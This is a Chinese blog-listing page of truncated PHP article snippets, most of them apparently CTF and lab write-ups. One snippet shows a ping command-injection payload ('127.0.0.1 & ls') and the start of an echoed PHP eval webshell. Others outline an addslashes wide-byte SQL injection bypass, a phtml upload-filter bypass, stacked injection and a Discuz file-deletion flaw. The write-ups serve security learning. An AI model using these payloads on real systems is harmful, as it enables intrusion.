PhalApi是一款国人制作的PHP纯后端框架。它的开发相当简单,同时也具备文档生成等特色功能。下面,我通过简单的几点,让你可以快速入门使用该框架的开发。 建议使用PHPStorm作为IDE,代码提示相当完全。由于PHP的热更新特性,修改过的PHP文件保存后立即生效,无需编译,无需重启服务器。 什么 ...
一个简单的ping,还没有过滤,源码也给出来了 ls一下 127.0.0.1 & ls 有一个可疑的php文件,,,但是直接访问和 cat 都出不来。。。 试了几下反弹shell,没成功。。。于是直接用echo了一个一句话进去 127.0.0.1 & echo "<?php eval(@\$_POS ...
分类:
Web程序 时间:
2020-03-04 19:00:03
阅读次数:
495
1.查看一下php文件: check_addslashes()会在单引号前加一个\ 例如:I'm hacker 传入addslashes(),得到:I\'m hacker 本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过: 原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8 ...
分类:
其他好文 时间:
2020-03-03 19:14:12
阅读次数:
91
//简单的上传题,考察绕过前端Js验证,phtml拓展名的应用 打开题目点亮小灯泡后可以看到一个上传点 传一个php测试一下: 发现有文件拓展名检查,F12发现是Js前端验证: 审查元素直接删掉,继续上传PHP文件测试: 发现还是被过滤了,应该是后端还有一次验证,换成phtml文件测试,phtml文 ...
分类:
其他好文 时间:
2020-03-03 19:11:20
阅读次数:
216
综述 学习网址 "菜鸟教程 PHP" 所有学习内容皆来自以上网站。 基础 语法 PHP 脚本以 结束; PHP 文件的默认文件扩展名是 ".php"。 变量/常量 变量 PHP 变量规则: 变量以 $ 符号开始,后面跟着变量的名称 变量名必须以字母或者下划线字符开始 变量名只能包含字母数字字符以及下 ...
分类:
Web程序 时间:
2020-03-01 14:44:50
阅读次数:
115
Less-42 打开这一关发现和之前的二次注入界面一样,使用admin admin登陆,发现回显正常 打开login.php文件,发现password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造,在password处使用堆叠构造 注入 ...
分类:
数据库 时间:
2020-02-29 18:41:30
阅读次数:
79
先说结果: 网上就两种方案: 一.定时md5遍历 无论是二分法还是什么法,我看到遍历这俩字,就不想继续研究下去了 遍历是效率黑洞 不够高效 二.ReadDirectoryChangesW [ReadDirectoryChangesW] 是win32api,只有文件修改的时候才触发 简单地说,方案一和 ...
分类:
编程语言 时间:
2020-02-28 12:09:57
阅读次数:
92
1、修改 application 中的 common.php 文件 use PHPMailer\PHPMailer\PHPMailer; function email($mailto, $subject, $content) { // 实列化PHPMailer,同时传递true表示启用异常机制 $m ...
分类:
Web程序 时间:
2020-02-26 18:49:14
阅读次数:
78
漏洞影响了Discuz3.4以下的所有版本。该漏洞存在于upload/source/include/spacecp/spacecp_profile.php,文件中的submitcheck()函数。成功上传文件会跳转执行unlink这个函数。1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e52.开启一个插件HackbarPost数据:birthprovince
分类:
Web程序 时间:
2020-02-24 22:20:06
阅读次数:
122
1、用户登录discuz,通过logging.php文件中的函数uc_user_login对post过来的数据进行验证,也就是对username和password进行验证。 2、如果验证成功,将调用位于uc_client下client.php文件中的函数uc_user_synlogin,在这个函数中 ...
分类:
其他好文 时间:
2020-02-24 09:28:44
阅读次数:
75
